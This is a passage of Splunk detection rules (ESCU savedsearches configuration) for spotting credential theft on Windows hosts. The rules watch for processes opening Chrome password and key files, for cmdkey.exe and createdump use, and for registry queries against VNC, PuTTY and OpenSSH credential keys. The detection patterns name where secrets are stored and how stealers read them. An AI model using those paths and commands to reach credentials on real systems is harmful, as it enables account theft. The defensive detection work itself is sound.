Trojan Stealers, such as SnakeKeylogger, which attempt to gather sensitive browser information and credentials as part of their exfiltration strategy. Detecting this anomaly can serve as a valuable pivot for identifying processes that access lists of browser user data profiles unexpectedly. This detection uses a lookup file `browser_app_list` that maintains a list of well known browser applications and the browser paths that are allowed to access the browser user data profiles. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." This search may trigger on a browser application that is not included in the browser_app_list lookup file. action.escu.known_false_positives = The lookup file `browser_app_list` may not contain all the browser applications that are allowed to access the browser user data profiles. Consider updating the lookup files to add allowed object paths for the browser applications that are not included in the lookup file. action.escu.creation_date = 2024-02-20 action.escu.modification_date = 2024-02-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credential Access From Browser Password Store - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A non-common browser process $process_name$ accessing browser user data folder on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credential Access From Browser Password Store - Rule action.correlationsearch.annotations = {"analytic_story": ["Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 | lookup browser_app_list browser_object_path as object_file_path OUTPUT browser_process_name isAllowed | stats count min(_time) as firstTime max(_time) as lastTime values(object_file_name) values(object_file_path) values(browser_process_name) as browser_process_name by dest process_name process_path process_id EventCode isAllowed | rex field=process_name "(?[^\\\\]+)$" | eval isMalicious=if(match(browser_process_name, extracted_process_name), "0", "1") | where isMalicious=1 and isAllowed="false" | `windows_credential_access_from_browser_password_store_filter` [ESCU - Windows Credential Dumping LSASS Memory Createdump - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of CreateDump.exe being used to perform a process dump. This particular binary is not native to Windows, but is found to be brought in my many different third party applications including PowerShell 7. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of CreateDump.exe being used to perform a process dump. This particular binary is not native to Windows, but is found to be brought in my many different third party applications including PowerShell 7. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present if an application is dumping processes, filter as needed. Recommend reviewing createdump.exe usage across the fleet to better understand all usage and by what. action.escu.creation_date = 2023-01-23 action.escu.modification_date = 2023-01-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credential Dumping LSASS Memory Createdump - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to dump a process. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 70}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 70}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credential Dumping LSASS Memory Createdump - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 70, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of CreateDump.exe being used to perform a process dump. This particular binary is not native to Windows, but is found to be brought in my many different third party applications including PowerShell 7. action.notable.param.rule_title = Windows Credential Dumping LSASS Memory Createdump action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=createdump.exe OR Processes.original_file_name="FX_VER_INTERNALNAME_STR" Processes.process="*-u *" AND Processes.process="*-f *" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credential_dumping_lsass_memory_createdump_filter` [ESCU - Windows Credentials from Password Stores Chrome Extension Access - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic focuses on identifying non-chrome processes that attempt to access the Chrome extensions file. This file contains crucial settings and information related to the browser's extensions installed on the computer. Adversaries and malware authors have been known to exploit this file to extract sensitive information from the Chrome browser on targeted hosts. Detecting such anomalous behavior provides valuable insights for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for access to the Chrome extensions file by non-chrome processes, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic focuses on identifying non-chrome processes that attempt to access the Chrome extensions file. This file contains crucial settings and information related to the browser's extensions installed on the computer. Adversaries and malware authors have been known to exploit this file to extract sensitive information from the Chrome browser on targeted hosts. Detecting such anomalous behavior provides valuable insights for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for access to the Chrome extensions file by non-chrome processes, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." action.escu.known_false_positives = Uninstall chrome browser extension application may access this file and folder path to removed chrome installation in the target host. Filter is needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Chrome Extension Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["DarkGate Malware", "CISA AA23-347A", "Amadey", "RedLine Stealer", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = A non-chrome process $process_name$ accessing chrome browser extension folder files on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Chrome Extension Access - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware", "CISA AA23-347A", "Amadey", "RedLine Stealer", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 object_file_path="*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*" AND NOT (process_path IN ("*:\\Windows\\explorer.exe", "*\\chrome.exe")) | stats count min(_time) as firstTime max(_time) as lastTime by object_file_name object_file_path process_name process_path process_id EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_chrome_extension_access_filter` [ESCU - Windows Credentials from Password Stores Chrome LocalState Access - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to detect non-chrome processes accessing the Chrome user data file called "local state." This file contains important settings and information related to the browser's operations on the computer. Threat actors, adversaries, and malware authors have been known to exploit this file in attempts to extract the encrypted master key used for decrypting passwords saved in the Chrome browser. Detecting access to the "local state" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can improve our ability to identify potential threats and safeguard sensitive information stored within the browser. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to detect non-chrome processes accessing the Chrome user data file called "local state." This file contains important settings and information related to the browser's operations on the computer. Threat actors, adversaries, and malware authors have been known to exploit this file in attempts to extract the encrypted master key used for decrypting passwords saved in the Chrome browser. Detecting access to the "local state" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can improve our ability to identify potential threats and safeguard sensitive information stored within the browser. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." action.escu.known_false_positives = Uninstall chrome application may access this file and folder path to removed chrome installation in target host. Filter is needed. action.escu.creation_date = 2023-04-26 action.escu.modification_date = 2023-04-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Chrome LocalState Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A non-chrome process $process_name$ accessing "Chrome\\User Data\\Local State" file on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Chrome LocalState Access - Rule action.correlationsearch.annotations = {"analytic_story": ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 object_file_path="*\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" NOT (process_name IN ("*\\chrome.exe","*:\\Windows\\explorer.exe")) | stats count min(_time) as firstTime max(_time) as lastTime by object_file_name object_file_path process_name process_path process_id EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_chrome_localstate_access_filter` [ESCU - Windows Credentials from Password Stores Chrome Login Data Access - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to identify non-chrome processes accessing the Chrome user data file called "login data." This SQLite database file contains important information related to the browser's operations on the computer. Threat actors, adversaries, and malware authors have been known to exploit this file in attempts to extract and decrypt passwords saved in the Chrome browser. Detecting access to the "login data" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to identify non-chrome processes accessing the Chrome user data file called "login data." This SQLite database file contains important information related to the browser's operations on the computer. Threat actors, adversaries, and malware authors have been known to exploit this file in attempts to extract and decrypt passwords saved in the Chrome browser. Detecting access to the "login data" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." action.escu.known_false_positives = Uninstall application may access this registry to remove the entry of the target application. filter is needed. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Chrome Login Data Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A non-chrome process $process_name$ accessing Chrome "Login Data" file on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Chrome Login Data Access - Rule action.correlationsearch.annotations = {"analytic_story": ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 object_file_path="*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" AND NOT (process_path IN ("*:\\Windows\\explorer.exe", "*:\\Windows\\System32\\dllhost.exe", "*\\chrome.exe")) | stats count min(_time) as firstTime max(_time) as lastTime by object_file_name object_file_path process_name process_path process_id EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_chrome_login_data_access_filter` [ESCU - Windows Credentials from Password Stores Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool and malware such as Darkgate malware to create stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool and malware such as Darkgate malware to create stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network administrator can use this tool for auditing process. action.escu.creation_date = 2023-11-23 action.escu.modification_date = 2023-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = a process $process_name$ was executed in $dest$ to create stored credentials action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool and malware such as Darkgate malware to create stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.notable.param.rule_title = Windows Credentials from Password Stores Creation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="cmdkey.exe" OR Processes.original_file_name = "cmdkey.exe" AND Processes.process = "*/generic*" Processes.process IN ("*/user*", "*/password*") by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_creation_filter` [ESCU - Windows Credentials from Password Stores Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool and malware such as Darkgate malware to delete stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool and malware such as Darkgate malware to delete stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network administrator can use this tool for auditing process. action.escu.creation_date = 2023-11-23 action.escu.modification_date = 2023-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = a process $process_name$ was executed in $dest$ to delete stored credentials action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool and malware such as Darkgate malware to delete stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.notable.param.rule_title = Windows Credentials from Password Stores Deletion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="cmdkey.exe" OR Processes.original_file_name = "cmdkey.exe" AND Processes.process = "*/delete*" by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_deletion_filter` [ESCU - Windows Credentials from Password Stores Query - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool such as winpeas that being used by ransomware prestige to list stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process execution of Windows OS cmdkey.exe tool. This tool is being abused or used by several post exploitation tool such as winpeas that being used by ransomware prestige to list stored user names, passwords or credentials in the targeted Windows OS host. This information can be used by the attacker to gain privilege escalation and persistence in the targeted hosts for further attacks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network administrator can use this tool for auditing process. action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = a process $process_name$ was executed in $dest$ to display stored username and credentials. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="cmdkey.exe" OR Processes.original_file_name = "cmdkey.exe" AND Processes.process = "*/list*" by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_query_filter` [ESCU - Windows Credentials in Registry Reg Query - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process command line related to the discovery of possible password or credentials in the registry. This technique is being abused by adversaries or post exploitation tools like winpeas to steal credentials in the registry in the targeted host. Registry can contain several sensitive information like username and credentials that can be used for privilege escalation, persistence or even in lateral movement. This Anomaly detection can be a good pivot to detect a suspicious process querying a registry related to password or private keys. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process command line related to the discovery of possible password or credentials in the registry. This technique is being abused by adversaries or post exploitation tools like winpeas to steal credentials in the registry in the targeted host. Registry can contain several sensitive information like username and credentials that can be used for privilege escalation, persistence or even in lateral movement. This Anomaly detection can be a good pivot to detect a suspicious process querying a registry related to password or private keys. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials in Registry Reg Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = reg query commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials in Registry Reg Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process = "* query *" AND Processes.process IN ("*\\Software\\ORL\\WinVNC3\\Password*", "*\\SOFTWARE\\RealVNC\\WinVNC4 /v password*", "*\\CurrentControlSet\\Services\\SNMP*", "*\\Software\\TightVNC\\Server*", "*\\Software\\SimonTatham\\PuTTY\\Sessions*", "*\\Software\\OpenSSH\\Agent\\Keys*", "*password*") by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_in_registry_reg_query_filter` [ESCU - Windows Curl Download to Suspicious Path - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of Windows Curl.exe downloading a file to a suspicious location. \ -O or --output is used when a file is to be downloaded and placed in a specified location. \ During triage, review parallel processes for further behavior. In addition, identify if the download was successful. If a file was downloaded, capture and analyze. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of Windows Curl.exe 